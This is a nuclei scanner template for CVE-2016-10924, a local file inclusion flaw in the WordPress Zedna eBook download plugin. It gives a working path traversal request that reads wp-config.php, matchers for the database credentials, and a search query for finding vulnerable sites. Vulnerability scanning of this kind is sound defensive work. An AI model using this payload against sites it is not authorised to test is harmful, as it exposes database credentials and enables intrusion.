nuclei-templates/http/cves/2016/CVE-2016-10924.yaml

52 lines
1.9 KiB
YAML
Raw Normal View History

2021-11-24 21:51:36 +00:00
id: CVE-2016-10924
info:
name: Wordpress Zedna eBook download <1.2 - Local File Inclusion
author: idealphase
severity: high
2022-06-20 16:09:16 +00:00
description: |
Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution.
2023-09-06 13:22:34 +00:00
remediation: |
Update to the latest version of the plugin to fix the vulnerability.
reference:
- https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
- https://www.exploit-db.com/exploits/39575
2021-11-24 21:51:36 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2016-10924
- https://wordpress.org/plugins/ebook-download/#developers
2024-05-31 19:23:20 +00:00
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-10924
cwe-id: CWE-22
2024-05-31 19:23:20 +00:00
epss-score: 0.01089
epss-percentile: 0.84323
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:*
2022-07-11 17:25:16 +00:00
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: zedna_ebook_download_project
product: zedna_ebook_download
2023-09-06 13:22:34 +00:00
framework: wordpress
google-query: inurl:"/wp-content/plugins/ebook-download"
2024-01-14 09:21:50 +00:00
tags: cve2016,cve,wordpress,edb,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project
http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022035463ec47dab2e9697b6674a8af15173fe0695e388c6704ee510f3d410ef89e8022100ad37ebb93323af593940c5eece752836b5f4ca33475290dcf8601e11cfe00fd8:922c64590222798bb761d5b6d8e72950